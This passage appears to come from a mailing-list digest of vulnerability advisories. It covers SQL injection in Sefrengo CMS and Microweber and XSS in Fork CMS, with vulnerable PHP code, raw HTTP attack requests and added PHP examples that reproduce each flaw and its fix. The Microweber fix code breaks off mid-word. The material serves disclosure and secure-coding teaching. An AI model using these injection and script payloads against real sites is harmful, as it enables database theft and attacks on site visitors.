      if ( ereg("^".$name.":.*", $str3) ) {
        $str = ereg_replace("^".$name.":", "", $str3 );
      } else {
        switch ( $this->encoding_mode ) {
          case "slashes":
            $str = stripslashes($str);
            break;
          case "base64":
          default:
            $str = base64_decode($str);
        }
      }
    };
    return $str;
  };
  return "";
}

Link 2:
- Vulnerable file: /backend/inc/class.values_ct.php
- Vulnerable function: function set_value($mixed)
- Vulnerable parameter: $mixed['id']
- Vulnerable code:

function set_value($mixed) {
  global $cms_db, $db;
  //build query
  $sql_group = (empty($mixed['group'])) ? 0 : ''.$mixed['group'];
  $sql_client = (empty($mixed['client'])) ? '' : 'AND idclient IN ('. $mixed['client'] .')';
  $sql_lang = (empty($mixed['lang'])) ? '' : 'AND idlang IN ('. $mixed['lang'] .')';
  $sql_key = (empty($mixed['key'])) ? '' : 'AND V.key1 = "'. $mixed['key'] . '" ';
  $sql_key2 = (empty($mixed['key2'])) ? '' : 'AND V.key2 = "'. $mixed['key2'] . '" ';
  $sql_key3 = (empty($mixed['key3'])) ? '' : 'AND V.key3 = "'. $mixed['key3'] . '" ';
  $sql_key4 = (empty($mixed['key4'])) ? '' : 'AND V.key4 = "'. $mixed['key4'] . '" ';
  $sql_id = (empty($mixed['id'])) ? "" : "AND V.idvalues = '". $mixed['id'] . "' ";
  $sql = "SELECT * FROM ". $cms_db['values'] ." AS V WHERE V.group_name IN ('$sql_group') $sql_client $sql_lang $sql_key $sql_key2 $sql_key3 $sql_key4 $sql_id";
  //die($sql);
  $db -> query($sql);
  $count_rows = $db ->num_rows();
  if($count_rows > 1){
    echo $sql .' Fehler in Klasse "cms_value_ct". Es wurde mehr als ein Ergebnis gefunden. Anfrage ist nicht eindeutig';
    exit;
  }
  elseif($count_rows == 1){
    $db -> next_record();
    $mixed['id'] = $db -> f('idvalues');
    //echo "update";
    $this -> _update_by_id($mixed);
  }
  else{
    $this -> insert($mixed);
  }
}

::DISCLOSURE::
+ 01/08/2015: Sent the details of the vulnerabilities to the vendor; vendor confirmed
+ 01/25/2015: Vendor released patch
+ 01/26/2015: ITAS Team published information

::REFERENCE::
- Detail and videos: http://www.itas.vn/news/itas-team-found-out-multiple-sql-injection-vulnerabilities-in-sefrengo-cms-v1-6-1-74.html
- https://github.com/sefrengo-cms/sefrengo-1.x/commit/22c0d16bfd715631ed317cc990785ccede478f07

::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP.

----
ITAS Team (www.itas.vn)
[FD] SQL Injection Vulnerability in Microweber 0.95
# Exploit Title: SQL Injection Vulnerability in Microweber 0.95
# Vendor: https://microweber.com/
# Download link: https://microweber.com/download (https://github.com/microweber/microweber)
# CVE ID: CVE-2014-9464
# Vulnerability: SQL Injection
# Affected version: Version 0.95 before 12/09/2014.
# Fixed version: Version 0.95 updated on 12/11/2014
# Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn)

::VULNERABILITY DETAIL::

- A SQL injection vulnerability has been found and confirmed in the Microweber CMS, reachable as an anonymous user. A successful attack could allow an anonymous attacker to access information such as usernames and password hashes, or other private information that is stored in the database. The following URL and parameter have been confirmed to suffer from SQL injection.

- Attack vector:
GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive

- Vulnerable file: microweber-master/src/Microweber/Category.php
- Vulnerable function: get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
- Vulnerable parameter: $parent_id
- Vulnerable code:

public function get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
{
    $categories_id = intval($parent_id);
    $cache_group = 'categories/' . $categories_id;
    $table = $this->tables['categories'];
    $db_t_content = $this->tables['content'];
    if (isset($orderby) == false) {
        $orderby = array();
        //$orderby[0] = 'updated_on';
        //$orderby[1] = 'DESC';
        $orderby[0] = 'position';
        $orderby[1] = 'asc';
    }
    if (intval($parent_id) == 0) {
        return false;
    }
    $data = array();
    $data['parent_id'] = $parent_id;
    if ($type != FALSE) {
        $data['data_type'] = $type;
    } else {
        $type = 'category_item';
        $data['data_type'] = $type;
    }
    $cache_group = 'categories/' . $parent_id;
    $q = " SELECT id, parent_id FROM $table WHERE parent_id=$parent_id ";
    $q_cache_id = __FUNCTION__ . crc32($q);
    $save = $this->app->db->query($q, $q_cache_id, $cache_group);
    if (empty($save)) {
        return false;
    }
    $to_return = array();
    if (is_array($save) and !empty($save)) {
        foreach ($save as $item) {
            $to_return[] = $item['id'];
        }
    }
    $to_return = array_unique($to_return);
    return $to_return;
}

- Fix code:

public function get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
{
    $categories_id = $parent_id = intval($parent_id);
    $cache_group = 'categories/' . $categories_id;
    $table = $this->tables['categories'];
    $db_t_content = $this->tables['content'];
    if (isset($orderby) == false) {
        $orderby = array();
        //$orderby[0] = 'updated_on';
        //$orderby[1] = 'DESC';
        $orderby[0] = 'position';
        $orderby[1] = 'asc';
    }
    if (intval($parent_id) == 0) {
        return false;
    }
    $data = array();
    $data['parent_id'] = $parent_id;
    if ($type != FALSE) {
        $data['data_type'] = $type;
    } else {
        $type = 'category_item';
        $data['data_type'] = $type;
    }
    $cache_group = 'categories/' . $parent_id;
    $q = " SELECT id, parent_id FROM $table WHERE parent_id=$parent_id ";
    $q_cache_id = __FUNCTION__ . crc32($q);
    $save = $this->app->db->query($q, $q_cache_id, $cache_group);
    if (empty($save)) {
        return false;
    }
    $to_return = array();
    if (is_array($save) and !empty($save)) {
        fore
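The ProjectSend and Microweber advisories above are the same bug seen twice: an integer id spliced unquoted into SQL. ProjectSend runs the value through mysql_real_escape_string(), which only backslashes quote characters and so does nothing for a payload such as `1 OR 1=1` in `WHERE id=$client_id`; Microweber computes intval() into $categories_id but queries with the untouched $parent_id, and its `intval($parent_id) == 0` guard passes because intval() silently turns the same payload into 1. The script below is an added example, not code from either project or from ITAS. It assumes PHP CLI with the pdo_sqlite extension and an in-memory table in place of tbl_users; addslashes() stands in for mysql_real_escape_string(), which no longer exists in PHP 7+, and both leave a digits-and-spaces payload untouched.

```php
<?php
// Added example (not ProjectSend, Microweber or ITAS code). Both advisories
// share one bug: an id spliced unquoted into SQL. Escaping quotes cannot help
// in "WHERE id=$client_id" because the payload needs no quotes, and intval()
// used as a guard (but not as the queried value) hides the probe instead of
// stopping it. This reproduces the failure and the fix: validate the id as an
// integer and bind it as one. Assumptions: PHP CLI with the pdo_sqlite
// extension; the in-memory tbl_users table is constructed for the example.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tbl_users (id INTEGER, user TEXT, email TEXT)');
$db->exec("INSERT INTO tbl_users VALUES (1, 'alice', 'alice@example.org'), (2, 'admin', 'admin@example.org')");

/** The vulnerable pattern: escaped, but unquoted, so the escaping is irrelevant. */
function load_client_vulnerable(PDO $db, string $id): array
{
    $client_id = addslashes($id);   // stands in for mysql_real_escape_string()
    return $db->query("SELECT user FROM tbl_users WHERE id=$client_id")->fetchAll(PDO::FETCH_COLUMN);
}

/** Fixed: reject anything that is not a positive integer, then bind it as an integer. */
function load_client(PDO $db, $id): array
{
    $clean = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($clean === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $stmt = $db->prepare('SELECT user FROM tbl_users WHERE id = :id');
    $stmt->bindValue(':id', $clean, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

/** True if the fixed loader rejects the value instead of querying with it. */
function rejects(PDO $db, $id): bool
{
    try {
        load_client($db, $id);
        return false;
    } catch (InvalidArgumentException $e) {
        return true;
    }
}

$payload = '1 OR 1=1';   // constructed input: no quote characters, so escaping never triggers

assert(load_client_vulnerable($db, $payload) === ['alice', 'admin']);   // every row comes back
assert(load_client($db, '1') === ['alice']);
assert(rejects($db, $payload));
assert(rejects($db, '1; DROP TABLE tbl_users'));
assert(rejects($db, ''));

// intval(), the guard Microweber relied on, turns the same payload into 1 and
// passes the "== 0" check silently; FILTER_VALIDATE_INT reports it instead.
assert(intval($payload) === 1);
echo 'vulnerable query returned ' . count(load_client_vulnerable($db, $payload))
   . " rows; fixed query rejects the input\n";
```

Casting with `(int)` before the query would also close the hole, but it turns every probe into a valid request for id 1; rejecting non-integers outright keeps the attempt visible in the application's logs.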
[FD] XSS Vulnerability in Fork CMS 3.8.3
# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3
# Google Dork: N/A
# Date: 12/26/2014
# Exploit Author: Le Ngoc Phi (phi.n...@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: http://www.fork-cms.com
# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released
# Version: Fork 3.8.3
# Tested on: N/A
# CVE : CVE-2014-9470

::VULNERABILITY DETAIL::

- Vulnerable parameter: q_widget
- Vulnerable file: src/Frontend/Modules/Search/Actions/Index.php
- Vulnerable function: loadForm()
- Attack vector:
GET /en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search HTTP/1.1
Host: forkcms.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; __utma=23748525.1232410121.1415937482.1419392332.1419480017.3; __utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482; PHPSESSID=gailpg881ubvtsmroh2p1bfqn5
Connection: keep-alive

- Vulnerable code:

private function loadForm()
{
    // create form
    $this->frm = new FrontendForm('search', null, 'get', null, false);

    // could also have been submitted by our widget
    if (!\SpoonFilter::getGetValue('q', null, '')) {
        $_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');
    }

    // create elements
    $this->frm->addText(
        'q',
        null,
        255,
        'inputText liveSuggest autoComplete',
        'inputTextError liveSuggest autoComplete'
    );

    // since we know the term just here we should set the canonical url here
    $canonicalUrl = SITE_URL . FrontendNavigation::getURLForBlock('Search');
    if (isset($_GET['q']) && $_GET['q'] != '') {
        $canonicalUrl .= '?q=' . $_GET['q'];
    }
    $this->header->setCanonicalUrl($canonicalUrl);
}

::DISCLOSURE::
- 12/25/2014: Detected vulnerability
- 12/25/2014: Informed vendor; vendor confirmed
- 12/26/2014: Vendor released patch
- 12/26/2014: ITAS Team published information

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerability-in-fork-cms-70.html
- https://github.com/forkcms/forkcms/issues/1018s
- https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d872114

ITAS Team
ITAS Corp. Be protected with us
Office: 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.
Tel: +84 - 8 - 38931952
Hotline: 0903445711
Email: i...@itas.vn
Web: www.itas.vn
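The three cross-site scripting findings in this digest (the Zeuscart search reflection in the first message, the stored Community Gallery image title, and the Fork CMS q_widget reflection above) differ only in where user text lands. Zeuscart's response shows the term inside `value="..." onclick="searchitem();"` and Fork CMS's payload `"onmouseover="alert('XSS')"` likewise only has to close a quoted attribute; the gallery title is rendered as element text, where a bare `<script>` tag suffices. The script below is an added example, not code from any of the three products or from ITAS, and runs stand-alone on the PHP CLI. The template strings are constructed to match the shapes the advisories show, not taken from the products.

```php
<?php
// Added example (not Zeuscart, Community Gallery, Fork CMS or ITAS code).
// Shows the one encoder that is safe for both HTML element text and quoted
// attribute values, checked against the payloads from the three advisories.
// The template strings are constructed for the example.

/** Encode for HTML element text and for double- or single-quoted attribute values. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Search box in the shape the Zeuscart response shows, value unencoded. */
function search_box_vulnerable(string $term): string
{
    return '<input type="text" name="search" value="' . $term . '" onclick="searchitem();">';
}

/** Same template with the value encoded for the attribute context. */
function search_box(string $term): string
{
    return '<input type="text" name="search" value="' . h($term) . '" onclick="searchitem();">';
}

/** Stored title rendered as element text (the gallery finding). */
function image_caption(string $title): string
{
    return '<h2 class="title">' . h($title) . '</h2>';
}

// Payloads as given in the advisories (URL-decoded).
$zeuscart = '"--><ScRipt>alert(/ITASVN/)</ScRipT>';
$fork     = '"onmouseover="alert(\'XSS\')"';
$gallery  = "<script>alert('XSS')</script>";

// Unencoded: the payload's first quote closes value="" and the rest is live
// markup, so the response gains two extra tags or a new event handler.
assert(substr_count(search_box_vulnerable($zeuscart), '<') === 3);
assert(strpos(search_box_vulnerable($fork), '"onmouseover="alert') !== false);

// Encoded: quotes and angle brackets become entities, so the input can neither
// end the attribute nor open a tag. Only the template's own tags remain.
assert(search_box($zeuscart) === '<input type="text" name="search" value="&quot;--&gt;&lt;ScRipt&gt;alert(/ITASVN/)&lt;/ScRipT&gt;" onclick="searchitem();">');
assert(search_box($fork) === '<input type="text" name="search" value="&quot;onmouseover=&quot;alert(&#039;XSS&#039;)&quot;" onclick="searchitem();">');
assert(image_caption($gallery) === '<h2 class="title">&lt;script&gt;alert(&#039;XSS&#039;)&lt;/script&gt;</h2>');
assert(substr_count(search_box($zeuscart), '<') === 1);

echo "all three payloads neutralised\n";
```

Two caveats the advisories' fixes depend on: encode at output rather than at input, since the gallery title and search terms are legitimate to store as typed and a different output context needs a different encoder (json_encode() with the JSON_HEX_* flags for a script block, rawurlencode() for a URL component such as the canonical URL Fork CMS builds from $_GET['q']); and attribute values must always be quoted in the template, because htmlspecialchars() does not stop a space from ending an unquoted attribute.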